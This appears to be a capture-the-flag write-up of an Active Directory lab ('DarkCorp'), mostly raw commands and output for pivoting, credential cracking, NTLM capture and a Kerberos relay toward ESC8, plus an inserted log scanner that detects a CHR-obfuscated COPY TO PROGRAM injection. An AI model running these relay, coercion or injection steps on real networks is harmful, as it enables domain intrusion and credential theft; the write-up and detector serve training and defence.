WARN[0000] Ligolo-ng API is experimental, and should be running behind a reverse-proxy if publicly exposed.
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: 0.8.2
ligolo-ng » INFO[0005] Agent joined. id=00155d840302 name=postgres@drip remote="10.129.232.7:54378"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - postgres@drip - 10.129.232.7:54378 - 00155d840302
[Agent : postgres@drip] » interface_create --name drip
INFO[0023] Creating a new drip interface...
INFO[0023] Interface created!
[Agent : postgres@drip] » tunnel_start --tun drip
INFO[0048] Starting tunnel to postgres@drip (00155d840302)
[Agent : postgres@drip] » interface_add_route --name drip --route 172.16.20.3/24
INFO[0067] Route created.
[Agent : postgres@drip] »
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
^C
--- 172.16.20.1 ping statistics ---
22 packets transmitted, 0 received, 100% packet loss, time 21499ms
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -p 80,445,135,3389 -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 07:58 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (0.28s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Once configured, I can't ping through it, limited by the postgres user's low privileges, but internal hosts can be accessed normally.
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nmap -Pn 172.16.20.2
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-18 08:01 EST
Nmap scan report for 172.16.20.2 (172.16.20.2)
Host is up (3.2s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5000/tcp open upnp
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 9.45 seconds
Port 5000 shows a default login prompt.
I tested the database credentials and couldn't log in. It looks like HTTP Basic authentication, but given the environment I lean toward it being NTLM / Negotiate authentication.
1.4.5. pgsql backups via GPG decrypt
I found a lot of backup files:
postgres@drip:/var/log/postgresql$ ls
postgresql-15-main.log postgresql-15-main.log.2.gz postgresql-15-main.log.5.gz postgresql-15-main.log.8.gz
postgresql-15-main.log.1 postgresql-15-main.log.3.gz postgresql-15-main.log.6.gz postgresql-15-main.log.9.gz
postgresql-15-main.log.10.gz postgresql-15-main.log.4.gz postgresql-15-main.log.7.gz
Among them, ebelford's hash can be obtained:
postgres@drip:/var/log/postgresql$ zcat *.gz | grep ebelford
2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT: UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;
The plaintext password cracks to ThePlague61780.
It can be used to SSH in as ebelford.
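The statement logged above and the stacked DO $$ ... EXECUTE $$ injection from section 1.3 are both things a defender can catch in the PostgreSQL log. The scanner below is an added example (not code from the box or from this writeup): it parses lines in the log_line_prefix format seen here, flags COPY ... TO/FROM PROGRAM, SQL assembled from CHR() and run via EXECUTE, and statements stacked after the application's own query, and it redacts any password value before the record is forwarded, since the log itself is what leaked ebelford's hash. The sample lines are constructed (one mirrors the UPDATE shown above); catching the injection this way assumes log_statement = 'all' on the server, and the patterns are starting points rather than a complete ruleset.

```python
import re

# One log line in the prefix format used on this host:
# "<timestamp> <tz> [<pid>] <user>@<db> <LEVEL>:  <text>"
PG_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+ \S+) \[(?P<pid>\d+)\] "
    r"(?P<user>[^@\s]+)@(?P<db>\S+) (?P<level>[A-Z]+):\s+(?P<text>.*)$"
)

SUSPICIOUS = [
    # COPY ... TO/FROM PROGRAM runs a shell command as the postgres OS user
    ("copy-program", re.compile(r"\b(to|from)\s+program\b", re.I)),
    # A DO block that builds SQL from CHR() and runs it with EXECUTE: a keyword
    # filter on the request never sees the real statement, but the log does
    ("dynamic-sql-obfuscation", re.compile(r"\bDO\b.*\bCHR\s*\(.*\bEXECUTE\b", re.I)),
    # A second statement stacked after the application's own query
    ("stacked-statement", re.compile(r";\s*(select|do|copy|create|update|insert|delete)\b.*;", re.I)),
]
# Credential values that end up in the log when a failing statement is echoed back
SECRET_RE = re.compile(r"(password\s*=\s*)('?)[^\s,;']+\2", re.I)

# Constructed sample lines; the UPDATE mirrors the one found in the real log
SAMPLE_PG_LOG = [
    "2025-02-03 11:05:04.886 MST [5952] postgres@dripmail ERROR:  syntax error at or near \"WHERE\" at character 63",
    "2025-02-03 11:05:04.886 MST [5952] postgres@dripmail STATEMENT:  UPDATE Users SET password = 8bbd7f88841b4223ae63c8848969be86 WHERE username = ebelford;",
    "2025-02-05 09:12:30.101 MST [6120] dripmail_dba@dripmail LOG:  statement: SELECT id, username FROM \"Users\" WHERE username = 'bcase'",
    "2025-02-05 09:13:02.477 MST [6120] dripmail_dba@dripmail LOG:  statement: SELECT id, username FROM \"Users\" WHERE username = '';DO $$ DECLARE cmd text; BEGIN cmd := CHR(67) || 'OPY (SELECT '''') to program ''id'''; EXECUTE cmd; END $$;",
    "\tat line 3",   # continuation line without a prefix
]


def parse_pg_line(line: str):
    """Split one log line into its prefix fields; None for continuation lines."""
    m = PG_LINE.match(line)
    return m.groupdict() if m else None


def redact_secrets(text: str) -> str:
    """Replace the value of any password = ... assignment, quoted or not."""
    return SECRET_RE.sub(r"\1\2<redacted>\2", text)


def scan_pg_log(lines):
    """Return one record per line that is a suspicious statement or leaks a
    credential. Statement text in the record is always redacted."""
    findings = []
    for line in lines:
        rec = parse_pg_line(line)
        if rec is None:
            continue
        tags = [name for name, rx in SUSPICIOUS if rx.search(rec["text"])]
        if SECRET_RE.search(rec["text"]):
            tags.append("secret-in-log")
        if tags:
            findings.append({
                "ts": rec["ts"], "user": rec["user"], "db": rec["db"],
                "level": rec["level"], "tags": tags,
                "statement": redact_secrets(rec["text"]),
            })
    return findings
```

The detection deliberately keys on "to program" and on the DO/CHR/EXECUTE shape rather than on the COPY keyword, because CHR(67) || 'OPY' is exactly how the request-side filter was defeated. The stacked-statement rule will also fire on legitimate multi-statement batches, so it should be scoped to the application role (dripmail_dba here) that is never expected to send them.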
┌──(root㉿kali)-[/usr/share/responder]
└─# ping 172.16.20.1
PING 172.16.20.1 (172.16.20.1) 56(84) bytes of data.
64 bytes from 172.16.20.1: icmp_seq=1 ttl=64 time=313 ms
64 bytes from 172.16.20.1: icmp_seq=2 ttl=64 time=267 ms
64 bytes from 172.16.20.1: icmp_seq=3 ttl=64 time=185 ms
64 bytes from 172.16.20.1: icmp_seq=4 ttl=64 time=187 ms
64 bytes from 172.16.20.1: icmp_seq=5 ttl=64 time=278 ms
^C
--- 172.16.20.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4004ms
rtt min/avg/max/mdev = 185.184/245.832/312.658/51.272 ms
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders
(limit 70)
-rwxr--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-mLZiKDMy.sh
-rwxr--r-- 1 postgres postgres 7100304 Jan 18 05:27 /tmp/fscan-eAbbRdOo
-rwxr--r-- 1 postgres postgres 5944464 Jan 18 05:21 /tmp/nmap
-rw------- 1 postgres postgres 835 Jan 18 05:31 /tmp/result.txt
-rw-r--r-- 1 postgres postgres 956174 Jan 18 05:08 /tmp/linpeas-IfofOSGC.sh
-rwxr--r-- 1 postgres postgres 6475928 Jan 18 05:29 /tmp/agent-AVElfFOs
-rw-r--r-- 1 root root 6028 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_progress.bc
-rw-r--r-- 1 root root 4704 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_throttle.bc
-rw-r--r-- 1 root root 19068 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_copy.bc
-rw-r--r-- 1 root root 8320 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_lz4.bc
-rw-r--r-- 1 root root 3668 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_sink.bc
-rw-r--r-- 1 root root 7576 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_target.bc
-rw-r--r-- 1 root root 9048 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_zstd.bc
-rw-r--r-- 1 root root 13456 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/backup_manifest.bc
-rw-r--r-- 1 root root 9912 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_server.bc
-rw-r--r-- 1 root root 44976 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup.bc
-rw-r--r-- 1 root root 7888 Nov 19 2024 /usr/lib/postgresql/15/lib/bitcode/postgres/backup/basebackup_gzip.bc
-rw-r--r-- 1 root root 5714 Jan 2 2025 /var/backups/alternatives.tar.2.gz
-rw-r--r-- 1 root root 2229 Dec 19 2024 /var/backups/alternatives.tar.5.gz
>>>> -rw-r--r-- 1 postgres postgres 1784 Feb 5 2025 /var/backups/postgres/dev-dripmail.old.sql.gpg
-rw-r--r-- 1 root root 32 Dec 24 2024 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 5711 Jan 6 2025 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 5714 Jan 1 2025 /var/backups/alternatives.tar.3.gz
-rw-r--r-- 1 root root 32 Dec 20 2024 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 32 Dec 19 2024 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 81920 Jan 18 00:00 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 0 Jan 18 00:00 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 32 Jan 1 2025 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 5710 Dec 24 2024 /var/backups/alternatives.tar.4.gz
Running linPEAS, I found /var/backups/postgres/dev-dripmail.old.sql.gpg. It is a GPG-encrypted backup of the old dev-dripmail database, and our current user postgres can read it. Since we earlier obtained the pg database password 2Qa2SsBkQvsc, I can try decrypting it with that password (the environment variable has to be set first so the passphrase prompt can appear properly):
postgres@drip:export TERM=xterm
postgres@drip:/var/backups/postgres$ gpg --batch -d dev-dripmail.old.sql.gpg
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
"postgres <postgres@drip.darkcorp.htb>"
--
-- PostgreSQL database dump
--
-- Dumped from database version 15.10 (Debian 15.10-0+deb12u1)
-- Dumped by pg_dump version 15.10 (Debian 15.10-0+deb12u1)
SET statement_timeout = 0;
SET lock_timeout = 0;
SET idle_in_transaction_session_timeout = 0;
SET client_encoding = 'UTF8';
SET standard_conforming_strings = on;
SELECT pg_catalog.set_config('search_path', '', false);
SET check_function_bodies = false;
SET xmloption = content;
SET client_min_messages = warning;
SET row_security = off;
SET default_tablespace = '';
SET default_table_access_method = heap;
--
-- Name: Admins; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Admins" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80)
);
ALTER TABLE public."Admins" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Admins_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Admins_id_seq" OWNER TO postgres;
--
-- Name: Admins_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Admins_id_seq" OWNED BY public."Admins".id;
--
-- Name: Users; Type: TABLE; Schema: public; Owner: postgres
--
CREATE TABLE public."Users" (
id integer NOT NULL,
username character varying(80),
password character varying(80),
email character varying(80),
host_header character varying(255),
ip_address character varying(80)
);
ALTER TABLE public."Users" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE; Schema: public; Owner: postgres
--
CREATE SEQUENCE public."Users_id_seq"
AS integer
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER TABLE public."Users_id_seq" OWNER TO postgres;
--
-- Name: Users_id_seq; Type: SEQUENCE OWNED BY; Schema: public; Owner: postgres
--
ALTER SEQUENCE public."Users_id_seq" OWNED BY public."Users".id;
--
-- Name: Admins id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins" ALTER COLUMN id SET DEFAULT nextval('public."Admins_id_seq"'::regclass);
--
-- Name: Users id; Type: DEFAULT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users" ALTER COLUMN id SET DEFAULT nextval('public."Users_id_seq"'::regclass);
--
-- Data for Name: Admins; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Admins" (id, username, password, email) FROM stdin;
>>>> 1 bcase dc5484871bc95c4eab58032884be7225 bcase@drip.htb
>>>> 2 victor.r cac1c7b0e7008d67b6db40c03e76b9c0 victor.r@drip.htb
>>>> 3 ebelford 8bbd7f88841b4223ae63c8848969be86 ebelford@drip.htb
\.
--
-- Data for Name: Users; Type: TABLE DATA; Schema: public; Owner: postgres
--
COPY public."Users" (id, username, password, email, host_header, ip_address) FROM stdin;
5001 support d9b9ecbf29db8054b21f303072b37c4e support@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5002 bcase 1eace53df87b9a15a37fdc11da2d298d bcase@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
5003 ebelford 0cebd84e066fd988e89083879e88c5f9 ebelford@drip.htb Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/114.0.0.0 10.0.50.10
\.
--
-- Name: Admins_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Admins_id_seq"', 1, true);
--
-- Name: Users_id_seq; Type: SEQUENCE SET; Schema: public; Owner: postgres
--
SELECT pg_catalog.setval('public."Users_id_seq"', 5003, true);
--
-- Name: Admins Admins_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Admins"
ADD CONSTRAINT "Admins_pkey" PRIMARY KEY (id);
--
-- Name: Users Users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
ALTER TABLE ONLY public."Users"
ADD CONSTRAINT "Users_pkey" PRIMARY KEY (id);
--
-- Name: TABLE "Admins"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Admins" TO dripmail_dba;
--
-- Name: SEQUENCE "Admins_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Admins_id_seq" TO dripmail_dba;
--
-- Name: TABLE "Users"; Type: ACL; Schema: public; Owner: postgres
--
GRANT SELECT ON TABLE public."Users" TO dripmail_dba;
--
-- Name: SEQUENCE "Users_id_seq"; Type: ACL; Schema: public; Owner: postgres
--
GRANT ALL ON SEQUENCE public."Users_id_seq" TO dripmail_dba;
--
-- PostgreSQL database dump complete
--
postgres@drip:/var/backups/postgres$
Three users' MD5 hashes can be obtained:
dc5484871bc95c4eab58032884be7225
cac1c7b0e7008d67b6db40c03e76b9c0
8bbd7f88841b4223ae63c8848969be86
The password of victor.r@drip.htb cracks to victor1gustavo@#
1.5. Internal Status Monitor
With this password I can log in to the Internal Status Monitor.
It is a site that monitors the status of internal hosts.
Seeing this, NTLM relay comes to mind right away; I have definitely come across something similar before, but I can't recall it right now.
In addition, this credential also logs in to the domain:
┌──(root㉿kali)-[/usr/share/responder]
└─# nxc smb 172.16.20.1 -u victor.r -p victor1gustavo@#
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
1.5.1. NTLM relay
First configure authentication in Burp.
Then capture a request and take a look.
Use ligolo to forward a port:
[Agent : ebelford@drip] » listener_add --tcp --addr 0.0.0.0:8080 --to 10.10.14.86:80
INFO[0085] Listener 0 created on remote agent!
It can be tested with nc:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.14.86] 54606
GET / HTTP/1.1
Host: drip.darkcorp.htb:8080
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
No problem.
Use Responder to capture the Net-NTLMv2 hash.
Here, because my Responder was misbehaving, I couldn't capture the Net-NTLMv2 hash.
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.11.54
[HTTP] NTLMv2 Username : darkcorp\svc_acc
[HTTP] NTLMv2 Hash : svc_acc::darkcorp:ffdb62442934ec...
If all goes well you obtain a hash like this, but it can't be cracked.
1.6. SMB
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc smb 172.16.20.1 -u victor.r -p 'victor1gustavo@#' --shares
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
SMB 172.16.20.1 445 DC-01 [*] Enumerated shares
SMB 172.16.20.1 445 DC-01 Share Permissions Remark
SMB 172.16.20.1 445 DC-01 ----- ----------- ------
SMB 172.16.20.1 445 DC-01 ADMIN$ Remote Admin
SMB 172.16.20.1 445 DC-01 C$ Default share
SMB 172.16.20.1 445 DC-01 CertEnroll READ Active Directory Certificate Services share
SMB 172.16.20.1 445 DC-01 IPC$ READ Remote IPC
SMB 172.16.20.1 445 DC-01 NETLOGON READ Logon server share
SMB 172.16.20.1 445 DC-01 SYSVOL READ Logon server share
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# impacket-smbclient -k DC-01.darkcorp.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use CertEnroll
# ls
drw-rw-rw- 0 Sun Jan 18 07:37:18 2026 .
drw-rw-rw- 0 Sun Dec 29 18:38:06 2024 ..
-rw-rw-rw- 990 Sun Jan 18 07:37:18 2026 DARKCORP-DC-01-CA+.crl
-rw-rw-rw- 1184 Sat Jan 17 07:37:18 2026 DARKCORP-DC-01-CA.crl
-rw-rw-rw- 1436 Wed Jan 22 07:18:28 2025 DC-01.darkcorp.htb_DARKCORP-DC-01-CA(1).crt
-rw-rw-rw- 1397 Sun Dec 29 18:34:10 2024 DC-01.darkcorp.htb_DARKCORP-DC-01-CA.crt
>>>> -rw-rw-rw- 328 Sun Dec 29 18:38:06 2024 nsrev_DARKCORP-DC-01-CA.asp
#
Nothing useful here, just some public keys, but it does show that this machine runs AD CS.
1.7. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# rusthound-ce -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb --zip
---------------------------------------------------
Initializing RustHound-CE at 09:39:57 on 01/18/26
Powered by @g0h4n_0
---------------------------------------------------
[2026-01-18T14:39:57Z INFO rusthound_ce] Verbosity level: Info
[2026-01-18T14:39:57Z INFO rusthound_ce] Collection method: All
[2026-01-18T14:39:57Z INFO rusthound_ce::ldap] Connected to DARKCORP.HTB Active Directory!
[2026-01-18T14:39:57Z INFO rusthound_ce::ldap] Starting data collection...
[2026-01-18T14:39:57Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:39:58Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=darkcorp,DC=htb
[2026-01-18T14:39:58Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:03Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=darkcorp,DC=htb
[2026-01-18T14:40:03Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:07Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=darkcorp,DC=htb
[2026-01-18T14:40:07Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:08Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=darkcorp,DC=htb
[2026-01-18T14:40:08Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2026-01-18T14:40:08Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=darkcorp,DC=htb
[2026-01-18T14:40:08Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
⢀ Parsing LDAP objects: 21%
[2026-01-18T14:40:08Z INFO rusthound_ce::objects::enterpriseca] Found 11 enabled certificate templates
[2026-01-18T14:40:08Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2026-01-18T14:40:08Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 13 users parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 62 groups parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 computers parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 4 ous parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 gpos parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 74 containers parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 aiacas parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 rootcas parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 33 certtemplates parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2026-01-18T14:40:08Z INFO rusthound_ce::json::maker::common] .//20260118094008_darkcorp-htb_rusthound-ce.zip created!
RustHound-CE Enumeration Completed at 09:40:08 on 01/18/26! Happy Graphing!
1.8. Web-01$
1.8.1. ADCS enumeration (ESC8)
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# certipy find -u victor.r -p 'victor1gustavo@#' -dc-ip 172.16.20.1 -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'DARKCORP-DC-01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'DARKCORP-DC-01-CA'
[*] Checking web enrollment for CA 'DARKCORP-DC-01-CA' @ 'DC-01.darkcorp.htb'
[!] Failed to check channel binding: NTLM not supported. Try using Kerberos authentication (-k and -dc-host).
[*] Enumeration output:
Certificate Authorities
0
CA Name : DARKCORP-DC-01-CA
DNS Name : DC-01.darkcorp.htb
Certificate Subject : CN=DARKCORP-DC-01-CA, DC=darkcorp, DC=htb
Certificate Serial Number : 27637AF630C1D39945283AF47C89040C
Certificate Validity Start : 2024-12-29 23:24:10+00:00
Certificate Validity End : 2125-01-22 12:18:28+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : True
Channel Binding (EPA) : Unknown
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : DARKCORP.HTB\Administrators
Access Rights
ManageCa : DARKCORP.HTB\Administrators
DARKCORP.HTB\Domain Admins
DARKCORP.HTB\Enterprise Admins
ManageCertificates : DARKCORP.HTB\Administrators
DARKCORP.HTB\Domain Admins
DARKCORP.HTB\Enterprise Admins
Enroll : DARKCORP.HTB\Authenticated Users
[*] Remarks
ESC8 : Channel Binding couldn't be verified for HTTPS Web Enrollment. For manual verification, request a certificate via HTTPS with Channel Binding disabled and observe if the request succeeds or is rejected.
Certificate Templates : [!] Could not find any certificate templates
No template is vulnerable on its own, but the CA's web enrollment is reachable over HTTPS and certipy could not verify whether Extended Protection (channel binding) is enforced. Its NTLM probe was refused ("NTLM not supported" above), so the ESC8 path here goes through a Kerberos relay rather than the usual NTLM one.
1.8.2. Add DNS record
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nxc ldap 172.16.20.1 -u victor.r -p 'victor1gustavo@#'
LDAP 172.16.20.1 389 DC-01 [*] Windows Server 2022 Build 20348 (name:DC-01) (domain:darkcorp.htb)
(signing:None) (channel binding:Never)
LDAP 172.16.20.1 389 DC-01 [+] darkcorp.htb\victor.r:victor1gustavo@#
LDAP signing is not enforced and channel binding is never required on DC-01, so authentication can be relayed to LDAP. That is what we need for the first step of the Kerberos relay: a DNS record.
The record's name ends in a marshaled target-info blob (the 1UWhRC... suffix produced by CredMarshalTargetInfo). When WEB-01 is coerced into authenticating to this name, its Kerberos client strips the suffix and requests a service ticket for DC-01 rather than for our host, while still sending it to us. Because all of DC-01's SPNs share the same account key, that ticket can then be presented to the CA's web enrollment on DC-01.
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# bloodyAD -u victor.r -p 'victor1gustavo@#' -d darkcorp.htb -k --host DC-01.darkcorp.htb add dnsRecord DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
Traceback (most recent call last):
File "/root/.local/bin/bloodyAD", line 10, in <module>
sys.exit(main())
^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 342, in main
asyncio.run(amain())
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 195, in run
return runner.run(main)
^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/runners.py", line 118, in run
return self._loop.run_until_complete(task)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/.local/share/uv/python/cpython-3.12.11-linux-x86_64-gnu/lib/python3.12/asyncio/base_events.py", line 691, in run_until_complete
return future.result()
^^^^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/main.py", line 272, in amain
output = await result
^^^^^^^^^^^^
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/cli_modules/add.py", line 378, in dnsRecord
await ldap.bloodyadd(record_dn, attributes=record_attr)
File "/root/.local/share/uv/tools/bloodyad/lib/python3.12/site-packages/bloodyAD/network/ldap.py", line 229, in bloodyadd
raise err
badldap.commons.exceptions.LDAPAddException: insufficientAccessRights for DC=DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb (Attr) — Reason:(ERROR_ACCESS_DENIED) Access is denied.
Adding the record with bloodyAD fails because victor.r does not have the rights.
svc_acc, however, is a member of DnsAdmins and can create DNS records, so we add the record by relaying its NTLM authentication to LDAP with ntlmrelayx:
ntlmrelayx.py -t 'ldap://172.16.20.1' --no-dump --no-smb-server --no-acl --no-da --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.86
With the listener up, trigger another NTLM authentication from the web page (the same coercion that produced the svc_acc hash earlier); the relayed svc_acc session creates the record:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# ntlmrelayx.py -t 'ldap://172.16.20.1' --no-dump --no-smb-server --no-acl --no-da --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.86
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
